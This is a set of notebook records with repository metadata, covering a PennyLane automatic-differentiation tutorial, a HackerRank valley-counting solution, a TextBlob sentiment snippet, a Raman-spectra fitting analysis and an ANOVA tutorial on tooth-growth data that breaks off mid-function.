[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1d31dacc9b3fb7de29bba8d7fa69b2600eb25a
126,734
ipynb
Jupyter Notebook
1_classical_ml_with_automatic_differentiation.ipynb
SaashaJoshi/pennylane-demo-cern
d1ff6fa54b226c40bea24d38d53a9685b447bee4
[ "Apache-2.0" ]
null
null
null
1_classical_ml_with_automatic_differentiation.ipynb
SaashaJoshi/pennylane-demo-cern
d1ff6fa54b226c40bea24d38d53a9685b447bee4
[ "Apache-2.0" ]
null
null
null
1_classical_ml_with_automatic_differentiation.ipynb
SaashaJoshi/pennylane-demo-cern
d1ff6fa54b226c40bea24d38d53a9685b447bee4
[ "Apache-2.0" ]
null
null
null
132.98426
23,414
0.851752
[ [ [ "<a href=\"https://colab.research.google.com/github/SaashaJoshi/pennylane-demo-cern/blob/main/1_classical_ml_with_automatic_differentiation.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "%%capture \n\n# Comment this out if you don't want to install pennylane from this notebook\n!pip install pennylane\n\n# Comment this out if you don't want to install matplotlib from this notebook\n!pip install matplotlib", "_____no_output_____" ] ], [ [ "# Training a machine learning model with automatic differentiation", "_____no_output_____" ], [ "In this tutorial we will: \n\n* implement a toy version of a typical machine learning setup,\n* understand how automatic differentiation allows us to compute gradients of the machine learning model, and\n* use automatic differentiation to train the model.\n\nFirst some imports...", "_____no_output_____" ] ], [ [ "import pennylane as qml\nfrom pennylane import numpy as np # This will import a special, \"differentiable\" version of numpy.\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nnp.random.seed(42)", "_____no_output_____" ], [ "np.array([0.1, -0.9]) # This is a tensor array with gradient", "_____no_output_____" ], [ "import numpy as vanilla_np\n\nvanilla_np.array([0.1, -0.9])", "_____no_output_____" ], [ "x_axis = np.linspace(0, 6)\nfunction_sin = np.sin(x_axis)\n\nplt.plot(x_axis, function_sin)", "_____no_output_____" ], [ "# We can find the gradient of the above function too. \n# In a vanilla numpy version, we cannot differentiate!\n\ngradient_fnc = qml.grad(np.sin, argnum = 0)\n\ng = [gradient_fnc(x) for x in x_axis]\n\nplt.plot(x_axis, function_sin)\nplt.plot(x_axis, g)", "_____no_output_____" ] ], [ [ "## 1. The three basic ingredients", "_____no_output_____" ], [ "A machine learning problem usually consists of *data*, a *model (family)* and a *cost function*: \n\n<br />\n<img src=\"https://github.com/XanaduAI/pennylane-demo-cern/blob/main/figures/data-model-cost.png?raw=1\" width=\"500\">\n<br />\n\n*Training* selects the best model from the family by minimising the cost on a training set of data samples. If we design the optimisation problem well, the trained model will also have a low cost on new sets of data samples that have not been used in training. This means that the model *generalises* well. 
\n\nWe will now create examples for each ingredient.", "_____no_output_____" ], [ "### Data\n\nLet us create a two-dimensional toy dataset.", "_____no_output_____" ] ], [ [ "n_samples = 100\nX0 = np.array([[np.random.normal(loc=-1, scale=1), \n np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)]) \nX1 = np.array([[np.random.normal(loc=1, scale=1), \n np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)]) \nX = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.\nY = np.concatenate([-np.ones(50), np.ones(50)], axis=0)\ndata = list(zip(X, Y))\n\n\nplt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\nplt.show()", "_____no_output_____" ], [ "X.shape", "_____no_output_____" ] ], [ [ "### Model family\n\nNext, we construct a linear model.", "_____no_output_____" ] ], [ [ "def model(x, w):\n return np.dot(x, w)", "_____no_output_____" ] ], [ [ "Let's try it out.", "_____no_output_____" ] ], [ [ "w = np.array([-0.5, -0.2])\n\nmodel(X0[0], w)\n# model(X0[1], w)\n\n# If we put a threshold at zero (0), X0[0] would be classified in class +1 and X0[1] will be classified in class -1", "_____no_output_____" ] ], [ [ "We can plot the decision boundary, or the boundary in data space where the model flips from a negative to a positive prediction", "_____no_output_____" ] ], [ [ "plt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\n\nplt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')\nplt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')\nplt.show()", "_____no_output_____" ] ], [ [ "### Cost function\n\nHow good is the model on a single input-output training pair?", "_____no_output_____" ] ], [ [ "def loss(a, b):\n return (a - b)**2 # Square of difference.", "_____no_output_____" ] ], [ [ "What is the average loss on a data set of multiple pairs?", "_____no_output_____" ] ], [ [ "def average_loss(w, data):\n c = 0\n for x, y in data:\n prediction = model(x, w)\n c += loss(prediction, y)\n return c/len(data)", "_____no_output_____" ], [ "w = np.array([1.3, -0.4])\naverage_loss(w, data)", "_____no_output_____" ] ], [ [ "## 2. Automatic computation of gradients\n\nBecause we imported PennyLane's numpy version, we can now compute gradients of the average loss with respect to the weights!", "_____no_output_____" ] ], [ [ "gradient_fn = qml.grad(average_loss, argnum=0)\ngradient_fn(w, data)", "_____no_output_____" ] ], [ [ "We can use gradients to guess better candidates for parameters.", "_____no_output_____" ] ], [ [ "w_new = w - 0.05*gradient_fn(w, data)", "_____no_output_____" ], [ "average_loss(w_new, data)", "_____no_output_____" ] ], [ [ "This works because the gradient always points towards the steepest ascent in the cost landscape.", "_____no_output_____" ] ], [ [ "# compute the gradient at some point in parameter space\nsome_w = np.array([-0.6, 0.5])\ng = 0.01*gradient_fn(some_w, data)\n# learning rate = 0.01 here above!\n\n# make a contourplot of the cost\nw1s = np.linspace(-2, 2)\nw2s = np.linspace(-2, 2)\ncost_grid = []\nfor w1 in w1s:\n for w2 in w2s:\n w = np.array([w1, w2])\n cost_grid.append(average_loss(w, data))\ncost_grid = np.array(cost_grid).reshape((50, 50))\nplt.contourf(w1s, w2s, cost_grid.T)\n\nplt.arrow(some_w[0], some_w[1], some_w[0] + g[0], some_w[1] + g[1], \n head_width=0.3, head_length=0.3, fc='r', ec='r')\nplt.xlabel(r\"$w_1$\")\nplt.ylabel(r\"$w_2$\")\nplt.show()", "_____no_output_____" ] ], [ [ "## 3. 
Training with gradient descent\n\nPutting it all together, we can train the linear model.", "_____no_output_____" ] ], [ [ "w_init = np.random.random(size=(2,))\nw = np.array(w_init)\n\nhistory = []\nfor i in range(15):\n w_new = w - 0.05*gradient_fn(w, data)\n print(average_loss(w_new, data))\n history.append(w_new)\n w = w_new", "1.3500100407100541\n1.102185220934838\n0.9290184060813585\n0.8027576735134763\n0.7073372523673335\n0.6331673539752455\n0.5743007976098509\n0.5268826928791955\n0.488294380852497\n0.45667438524266574\n0.4306452071742513\n0.4091534224361\n0.3913728909446769\n0.376643727003794\n0.3644320177904416\n" ] ], [ [ "We can easily visualise the path that gradient descent took in parameter space.", "_____no_output_____" ] ], [ [ "plt.contourf(w1s, w2s, cost_grid.T)\nhistory = np.array(history)\nplt.plot(history[:, 0], history[:, 1], \"-o\")\nplt.xlabel(r\"$w_1$\")\nplt.ylabel(r\"$w_2$\")\nplt.show()", "_____no_output_____" ] ], [ [ "Training didn't fully converge yet, but the decision boundary is already better.", "_____no_output_____" ] ], [ [ "plt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\n\nplt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')\nplt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')\nplt.show()", "_____no_output_____" ] ], [ [ "# TASKS \n\n\n\n1. Add a constant scalar bias term $b \\in \\mathbb{R}$ to the model,\n\n $$ f(x, w) = \\langle w, x \\rangle + b, $$\n\n and train both $w$ and $b$ at the same time.\n \n\n2. Change the model to a neural network with a single hidden layer.\n\n $$ f(x, w, W) = \\langle w, \\varphi(Wx) \\rangle,$$\n\n where $W$ is a weight matrix of suitable dimension and $\\varphi$ a hand-coded nonlinar activation function. \n \n Tipp: You can use the vector-valued sigmoid function \n \n ```\n def sigmoid(z):\n return 1/(1 + np.exp(-x))\n ```\n \n\n3. Code up the above example using PyTorch.", "_____no_output_____" ] ], [ [ "n_samples = 100\nX0 = np.array([[np.random.normal(loc=-1, scale=1), \n np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)]) \nX1 = np.array([[np.random.normal(loc=1, scale=1), \n np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)]) \nX = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.\nY = np.concatenate([-np.ones(50), np.ones(50)], axis=0)\ndata = list(zip(X, Y))\n\n\nplt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\nplt.show()", "_____no_output_____" ], [ "samples = 100\n\n# Class 1\nX_1 = np.array([[np.random.normal, np.random.normal] for i in range(samples//2)])\n\n# Class 2\nX_2 = np.array([[np.random.normal, np.random.normal] for i in range(samples//2)])\n\n# Bias\nbias = np.array([n.random.normal] for i in range(samples))\n\nX = np.concatenate([X_1, X_2], axis = 0)\nX_data = np.add(X, bias)\n\nY_class_data = np.concatenate([-np.ones(50), np.ones(50)], axis = 0)\n\ndata = list(zip(X_data, Y_class_data))\n\nprint(X_data)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
cb1d3b241e2c9bc155330d36ae84778a65b2c998
5,957
ipynb
Jupyter Notebook
HackerRank/counting_valleys.ipynb
shaunhyp57/coding_practice
bb25385c605d4ab406ca52ccb48293e467711d68
[ "MIT" ]
null
null
null
HackerRank/counting_valleys.ipynb
shaunhyp57/coding_practice
bb25385c605d4ab406ca52ccb48293e467711d68
[ "MIT" ]
null
null
null
HackerRank/counting_valleys.ipynb
shaunhyp57/coding_practice
bb25385c605d4ab406ca52ccb48293e467711d68
[ "MIT" ]
null
null
null
27.967136
396
0.459795
[ [ [ "## **Counting Valleys** - HackerRank\n\nGary is an avid hiker. He tracks his hikes meticulously, paying close attention to small details like topography. During his last hike he took exactly $n$ steps. For every step he took, he noted if it was an uphill, $U$, or a downhill, $D$ step. Gary's hikes start and end at sea level and each step up or down represents a $1$ unit change in altitude. We define the following terms:\n\n* A mountain is a sequence of consecutive steps above sea level, starting with a step up from sea level and ending with a step down to sea level.\n* A valley is a sequence of consecutive steps below sea level, starting with a step down from sea level and ending with a step up to sea level.\nGiven Gary's sequence of up and down steps during his last hike, find and print the number of valleys he walked through.\n\nFor example, if Gary's path is $s = [DDUUUUDD]$, he first enters a valley $2$ units deep. Then he climbs out an up onto a mountain units high. Finally, he returns to sea level and ends his hike.\n\n**Function Description**\n\nComplete the countingValleys function in the editor below. It must return an integer that denotes the number of valleys Gary traversed.\n\ncountingValleys has the following parameter(s):\n\n* n: the number of steps Gary takes\n* s: a string describing his path\n\n**Input Format**\n\nThe first line contains an integer $n$, the number of steps in Gary's hike.\nThe second line contains a single string $s$, of $n$ characters that describe his path.\n\n**Constraints**\n* $2 \\leq n \\leq 10^6$\n* $s[i] \\in {UD}$\n\n**Output Format**\n\nPrint a single integer that denotes the number of valleys Gary walked through during his hike.\n\n**Sample Input**", "_____no_output_____" ], [ "```\n8\nUDDDUDUU\n```", "_____no_output_____" ], [ "**Sample Output**", "_____no_output_____" ], [ "```\n1\n```", "_____no_output_____" ], [ "**Explanation**\n\nIf we represent _ as sea level, a step up as /, and a step down as \\, Gary's hike can be drawn as:", "_____no_output_____" ], [ "```\n_/\\ _\n \\ /\n \\/\\/\n```", "_____no_output_____" ], [ "He enters and leaves one valley.", "_____no_output_____" ] ], [ [ "def countingValleys(n, s):\n # start of solution\n level = 0\n valley = 0\n for steps in s:\n if steps == 'U':\n level += 1\n if level == 0:\n # exit valley\n valley += 1\n else:\n level -= 1\n return valley\n # end of solution", "_____no_output_____" ], [ "n = len('UDDDUDUU')\ns = 'UDDDUDUU'\n\nprint(countingValleys(n, s))", "1\n" ], [ "n = len('DDUUDDUDUUUD')\ns = 'DDUUDDUDUUUD'\n\nprint(countingValleys(n, s))", "2\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ] ]
cb1d43e161ac0a1b17eb86b29a6555033fd973a8
3,519
ipynb
Jupyter Notebook
notebooks/analise_de_sentimento.ipynb
MauricioEloy/mlops
de4fc1204d70fa7d1caeca028d4efe33c63a3e60
[ "FTL" ]
null
null
null
notebooks/analise_de_sentimento.ipynb
MauricioEloy/mlops
de4fc1204d70fa7d1caeca028d4efe33c63a3e60
[ "FTL" ]
null
null
null
notebooks/analise_de_sentimento.ipynb
MauricioEloy/mlops
de4fc1204d70fa7d1caeca028d4efe33c63a3e60
[ "FTL" ]
null
null
null
20.108571
59
0.524013
[ [ [ "from textblob import TextBlob", "_____no_output_____" ], [ "frase = \"Python é ótimo para Machine Learning\"\ntb = TextBlob(frase)\ntb_en = tb.translate(to='en')", "_____no_output_____" ], [ "tb_en.sentiment.polarity", "_____no_output_____" ], [ "tb_en", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code" ] ]
cb1d63712576e0bb7d6a5a6051cbb848fdd34fb7
801,051
ipynb
Jupyter Notebook
notebooks/FIT.ipynb
FabioBrugnara/repo_raman
3f1af6cf6e585d5032bb5be942ddaf567b241310
[ "MIT" ]
5
2021-06-13T13:27:40.000Z
2022-03-13T09:31:39.000Z
notebooks/FIT.ipynb
FabioBrugnara/repo_raman
3f1af6cf6e585d5032bb5be942ddaf567b241310
[ "MIT" ]
null
null
null
notebooks/FIT.ipynb
FabioBrugnara/repo_raman
3f1af6cf6e585d5032bb5be942ddaf567b241310
[ "MIT" ]
null
null
null
2,130.454787
417,688
0.835353
[ [ [ "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom functions import *\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Per trovare i materiali che compongono i cluster scegliamo di **non eseguire un fit su ogni spettro all'interno di un determinato cluster**, ma **procediamo mediando su tutti gli spettri presenti nei singoli cluster e fittiamo sul risultato della media.**\n\nImportiamo cosi i centroidi dei vari cluster, che vengono restituiti in automatico dall'algoritmo k-means utilizzato per la clusterizzazione.", "_____no_output_____" ], [ "## Import dei dati", "_____no_output_____" ] ], [ [ "#import dei pesi dei cluster\nlabels=np.loadtxt(\"../data/processed/CLUSTERING_labels.txt\")", "_____no_output_____" ], [ "# import dei centroidi\ndata = pd.read_csv(\"../data/processed/CLUSTERING_data_centres.csv\")\ndata.drop(labels='Unnamed: 0',inplace=True,axis=1)", "_____no_output_____" ], [ "pure_material_names,pure_materials = import_pure_spectra('../data/raw/Database Raman/BANK_LIST.dat','../data/raw/Database Raman/')", "_____no_output_____" ] ], [ [ "## Interpolazione", "_____no_output_____" ], [ "**Le frequenze di campionamento degli spettri puri sono diverse tra loro e diverse da quelle utilizzate per il campionamento degli spettri sperimentali.** Per poter eseguire un fit dobbiamo per prima cosa interpolare i dati degli spettri puri con quelli degli spettri sperimentali. Dopo l'interpolazione le frequenze degli spettri puri saranno le stesse delle frequenze degli spettri sperimentlai.", "_____no_output_____" ] ], [ [ "pure_materials_interpoled=pd.DataFrame(data.wn.copy())\nfor temp in pure_material_names:\n pure_materials_interpoled=pure_materials_interpoled.join(pd.DataFrame(np.interp(data.wn, pure_materials[temp+'_wn'] ,pure_materials[temp+'_I']),columns=[temp]))", "_____no_output_____" ] ], [ [ "Dopo aver interpolato i dati normalizziamo gli spettri puri.", "_____no_output_____" ] ], [ [ "#Normalizzazione\nfor i in pure_material_names:\n pure_materials_interpoled[i]=pure_materials_interpoled[i]/np.trapz(abs(pure_materials_interpoled[i].dropna()), x=pure_materials_interpoled.wn)", "_____no_output_____" ] ], [ [ "## Fit", "_____no_output_____" ], [ "Per fittare gli spettri puri ai dati ragioniamo in questo modo:\n\n- possiamo vedere lo spettro incognito del centroide $C$ come una combinazione lineare con coefficienti non negativi di tutti gli spettri puri $P_{i}$.\n\n- Nel nostro modello gli spettri puri $P_{i} \\in \\mathbb{R}^n$ dove $n$ e' la dimesnionalita' del vettore delle intensita' dei vari spettri.\n \n- $C = \\sum \\alpha_{i}P_{i} + P_{0} $ dove $P_{0}$ e' un parametro costante.", "_____no_output_____" ], [ "Fortunatamente nell'ultimo aggiornamento di SikitLearn (rilasciato proprio nel periodo in cui abbiamo lavorato al progetto) e' stato introdotto il parametro \"positive\" in LinearRegression, che permette di considerare solo coefficienti non negativi. 
Questo è stato fondamentale dato che in ogni caso sarebbe stato necessario implementarlo, altrimenti il FIT utilzzava combinazioni di coeficienti positivi e negativi per utilizzando tutti gli spettri in modo da fittare il rumore.", "_____no_output_____" ] ], [ [ "ols=LinearRegression(positive=True) #definisco il regressore", "_____no_output_____" ] ], [ [ "Per ogni cluster facciamo quindi una regressione lineare estrapolando i coefficienti e l'intercetta.", "_____no_output_____" ] ], [ [ "N_cluster=len(data.columns)-1\ncoeff=[]\nintercept=[]\nfor i in range(N_cluster):\n ols.fit(pure_materials_interpoled[pure_material_names], data[str(i)]) #ottimizziamo il modello (lineare) su i dati di training\n coeff.append(ols.coef_)\n intercept.append(ols.intercept_)", "_____no_output_____" ] ], [ [ "### Plot dei vari centroidi dei cluster e del rispettivo fit", "_____no_output_____" ] ], [ [ "fig, axs = plt.subplots(nrows = N_cluster,figsize = (16,38))\nfor i in enumerate(range(N_cluster)):\n axs[i[0]].plot(data.wn,data[str(i[0])])\n axs[i[0]].plot(pure_materials_interpoled.wn,intercept[i[0]]+np.sum(pure_materials_interpoled[pure_material_names] * coeff[i[0]] ,axis=1))\n axs[i[0]].set_title('Cluster ' + str(i[0]))\n axs[i[0]].legend(['centroide','fit'], loc='upper right')", "_____no_output_____" ] ], [ [ "## Determinazione dell'abbondanza del materiale", "_____no_output_____" ], [ "Tenendo conto del numero di spettri presenti in ogni cluster, determiniamo il materiale piu' abbondande nel campione utilizzando i coefficienti dei fit. **Otteniamo così il risultato finale: le abbondanze nel campione**.", "_____no_output_____" ] ], [ [ "#elimino il cluster a 0 (se presente) e normalizzare i coefficienti per ogni cluster\nfor temp in np.unique(labels):\n if max(data[str(int(temp))])>1e-10:\n coeff[int(temp)]=coeff[int(temp)]/sum(coeff[int(temp)])\n else:\n print(f'Identificato lo spettro piatto, non utilizzato il cluster {int(temp)}')\n coeff[int(temp)]=np.zeros(len(coeff[int(temp)]))\n\n#numero di spettri per cluster in ordine\nweights=[np.count_nonzero(labels==i) for i in range(len(data.columns)-1)]\n\n#moltiplico i coeficienti del cluster i-esimo per questo numero\nabb_notnormalized=[coeff[i]*weights[i] for i in range(len(data.columns)-1)]\n\n#e infine ho la media pesata dei coeficienti\nabb=sum(abb_notnormalized)/(sum(abb_notnormalized).sum())\n\n#Creo un Pandas dataframe con nomi e abbondanze\nabb_table=pd.DataFrame({'names':pure_material_names,'abbundances':abb})\n\n#riordino in base alla concenrazione\nabb_table.sort_values('abbundances',ascending=False,inplace=True, ignore_index=True)\n\nabb_table[abb_table['abbundances']>0.01]", "_____no_output_____" ], [ "abb_table.to_csv(\"../data/processed/abb_table.csv\")", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ] ]
cb1d675eb49af4d9340ea6e2a593edbb3ee00a43
14,276
ipynb
Jupyter Notebook
01-python-EDA-stat-univariada/07 Inferência 2/inferencia_2_anova.ipynb
sn3fru/datascience_course
ee0a505134383034e09020d9b1de18904d9b2665
[ "MIT" ]
331
2019-01-26T21:11:45.000Z
2022-03-02T11:35:16.000Z
01-python-EDA-stat-univariada/07 Inferência 2/inferencia_2_anova.ipynb
sn3fru/datascience_course
ee0a505134383034e09020d9b1de18904d9b2665
[ "MIT" ]
2
2019-11-02T22:32:13.000Z
2020-04-13T10:31:11.000Z
01-python-EDA-stat-univariada/07 Inferência 2/inferencia_2_anova.ipynb
sn3fru/datascience_course
ee0a505134383034e09020d9b1de18904d9b2665
[ "MIT" ]
88
2019-01-25T16:53:47.000Z
2022-03-03T00:05:08.000Z
30.900433
832
0.57418
[ [ [ "# Teste para Duas Médias - ANOVA (Analysis of Variance)\n\nAnálise de variância é a técnica estatística que permite avaliar afirmações sobre as médias de populações. A análise visa, fundamentalmente, verificar se existe uma diferença significativa entre as médias e se os fatores exercem influência em alguma variável dependente, com $k$ populaçõess com médias $\\mu_i$ desconhecidas.\n\nOs pressupostos básicos da análise de variância são:\n\n- As amostras são aleatórias e independentes\n- As populações têm distribuição normal (o teste é paramétrico)\n- As variâncias populacionais são iguais\n\nNa prática, esses pressupostos não precisam ser todos rigorosamente satisfeitos. Os resultados são empiricamente verdadeiros sempre que as populações são aproximadamente normais (isso é, não muito assimétricas) e têm variâncias próximas. \n\nQueremos testar se as $k$ médias são iguais, para isto vamos utilizara tabela **ANOVA - Analysis of Variance**\n\nVariação dos dados:\n\n<br>\n$$SQT = \\sum_{i=1}^{k}\\sum_{j=1}^{n_i} (x_{ij}- \\overline x)^2 = \n \\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}^2 - \n \\frac{1}{n}\\Big(\\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}\\Big)^2 $$\n<br><br>\n$$SQE = \\sum_{i=1}^{k} n_i(\\overline x_{i}- \\overline x)^2 =\n \\sum_{i=1}^{k} \\frac{1}{n_i}\\Big (\\sum_{j=1}^{n_i} x_{ij}\\Big)^2 -\n \\frac{1}{n}\\Big(\\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}\\Big)^2 $$\n<br><br>\n$$SQR = \\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}^2 -\n \\sum_{i=1}^{k} \\frac{1}{n_i}\\Big (\\sum_{j=1}^{n_i} x_{ij}\\Big)^2$$\n<br><br>\nVerifica-se que:\n\n$$SQT=SQE+SQR$$\n\nonde:\n\n- SQT: Soma dos Quadrados Total\n- SQE: Soma dos Quadrados Explicada\n- SQR: Soma dos Quadrados dos Resíduos\n\n<br><br>\n<img src=\"img/anova.png\" width=\"450\" />\n<br><br>\n\nDentro das premissas de variáveis aleatórias e independentes, o ideal é que cada uma das variáveis de um modelo explique uma determinadda parte da variável dependente. Com isso, podemos imaginar como o *fit* desejado, veriáveis independentes entre si conforme ilustrado na figura abaixo.\n\n<br><br>\n<img src=\"img/anova_explicada.png\" width=\"350\" />\n<br><br>", "_____no_output_____" ], [ "# Exemplo: DataSet de crescimento de dentes com duas terapias diferentes\n\nO DataSet representa o crescimento de dentes em animais submetidos a duas terapias alternativas, onde a resposta é o comprimento dos odontoblastos (células responsáveis pelo crescimento dentário) em 60 porquinhos-da-índia. Cada animal recebeu um dos três níveis de dose de vitamina C (0,5, 1 e 2 mg / dia) por um dos dois métodos de entrega (suco de laranja \"OJ\" ou ácido ascórbico (uma forma de vitamina C e codificada como \"CV\").\n\nUma vantagem importante do ANOVA de duas vias é que ele é mais eficiente em comparação com o one-way. Existem duas fontes de variação designáveis supp e dose em nosso exemplo - e isso ajuda a reduzir a variação de erros, tornando esse design mais eficiente. A ANOVA bidirecional (fatorial) pode ser usada para, por exemplo, comparar as médias das populações que são diferentes de duas maneiras. Também pode ser usado para analisar as respostas médias em um experimento com dois fatores. Ao contrário do One-Way ANOVA, ele nos permite testar o efeito de dois fatores ao mesmo tempo. Pode-se também testar a independência dos fatores, desde que haja mais de uma observação em cada célula. 
A única restrição é que o número de observações em cada célula deve ser igual (não existe tal restrição no caso de ANOVA unidirecional).\n\nDiscutimos modelos lineares mais cedo - e ANOVA é de fato um tipo de modelo linear - a diferença é que ANOVA é onde você tem fatores discretos cujo efeito em um resultado contínuo (variável) você quer entender.", "_____no_output_____" ], [ "## Importando as bibliotecas", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport statsmodels.api as sm\nfrom statsmodels.formula.api import ols\nfrom statsmodels.stats.anova import anova_lm\nfrom statsmodels.graphics.factorplots import interaction_plot\nimport matplotlib.pyplot as plt\nfrom scipy import stats", "_____no_output_____" ] ], [ [ "## Importando os dados", "_____no_output_____" ] ], [ [ "datafile = \"../../99 Datasets/ToothGrowth.csv.zip\"\ndata = pd.read_csv(datafile)", "_____no_output_____" ], [ "data.head()", "_____no_output_____" ], [ "data.info()", "_____no_output_____" ], [ "data.describe()", "_____no_output_____" ], [ "fig = interaction_plot(data.dose, data.supp, data.len,\n colors=['red','blue'], markers=['D','^'], ms=10)", "_____no_output_____" ] ], [ [ "## Calculando a soma dos quadrados\n\n<br>\n<img src=\"img/SS.png\">\n<br>", "_____no_output_____" ] ], [ [ "# Graus de liberdade\n\nN = len(data.len)\ndf_a = len(data.supp.unique()) - 1\ndf_b = len(data.dose.unique()) - 1\ndf_axb = df_a*df_b \ndf_w = N - (len(data.supp.unique())*len(data.dose.unique()))", "_____no_output_____" ], [ "grand_mean = data['len'].mean()", "_____no_output_____" ], [ "# SS para o fator A\nssq_a = sum([(data[data.supp ==l].len.mean()-grand_mean)**2 for l in data.supp])\n\n# SS para o fator B\nssq_b = sum([(data[data.dose ==l].len.mean()-grand_mean)**2 for l in data.dose])\n\n# SS total\nssq_t = sum((data.len - grand_mean)**2)\n\n## SS do resíduo\nvc = data[data.supp == 'VC']\noj = data[data.supp == 'OJ']\nvc_dose_means = [vc[vc.dose == d].len.mean() for d in vc.dose]\noj_dose_means = [oj[oj.dose == d].len.mean() for d in oj.dose]\nssq_w = sum((oj.len - oj_dose_means)**2) +sum((vc.len - vc_dose_means)**2)\n\n# SS de AxB (iterativa)\nssq_axb = ssq_t-ssq_a-ssq_b-ssq_w", "_____no_output_____" ] ], [ [ "## Média dos Quadrados", "_____no_output_____" ] ], [ [ "# MQ da A\nms_a = ssq_a/df_a\n\n# MQ de B\nms_b = ssq_b/df_b\n\n# MQ de AxB\nms_axb = ssq_axb/df_axb\n\n# MQ do resíduo\nms_w = ssq_w/df_w", "_____no_output_____" ] ], [ [ "## F-Score", "_____no_output_____" ] ], [ [ "# F-Score de A\nf_a = ms_a/ms_w\n\n# F-Score de B\nf_b = ms_b/ms_w\n\n# F-Score de C\nf_axb = ms_axb/ms_w", "_____no_output_____" ] ], [ [ "## p-Value", "_____no_output_____" ] ], [ [ "# p-Value de A\np_a = stats.f.sf(f_a, df_a, df_w)\n\n# p-Value de B\np_b = stats.f.sf(f_b, df_b, df_w)\n\n# p-Value de C\np_axb = stats.f.sf(f_axb, df_axb, df_w)", "_____no_output_____" ] ], [ [ "## Resultados", "_____no_output_____" ] ], [ [ "# Colocando os resultados em um DataFrame\n\nresults = {'sum_sq':[ssq_a, ssq_b, ssq_axb, ssq_w],\n 'df':[df_a, df_b, df_axb, df_w],\n 'F':[f_a, f_b, f_axb, 'NaN'],\n 'PR(>F)':[p_a, p_b, p_axb, 'NaN']}\ncolumns=['sum_sq', 'df', 'F', 'PR(>F)']\n \naov_table1 = pd.DataFrame(results, columns=columns,\n index=['supp', 'dose', \n 'supp:dose', 'Residual'])", "_____no_output_____" ], [ "# Calculando Eta-Squared e Omega-Squared, e imprimindo a tabela\n\ndef eta_squared(aov):\n aov['eta_sq'] = 'NaN'\n aov['eta_sq'] = aov[:-1]['sum_sq']/sum(aov['sum_sq'])\n return aov\n \ndef omega_squared(aov):\n mse = aov['sum_sq'][-1]/aov['df'][-1]\n 
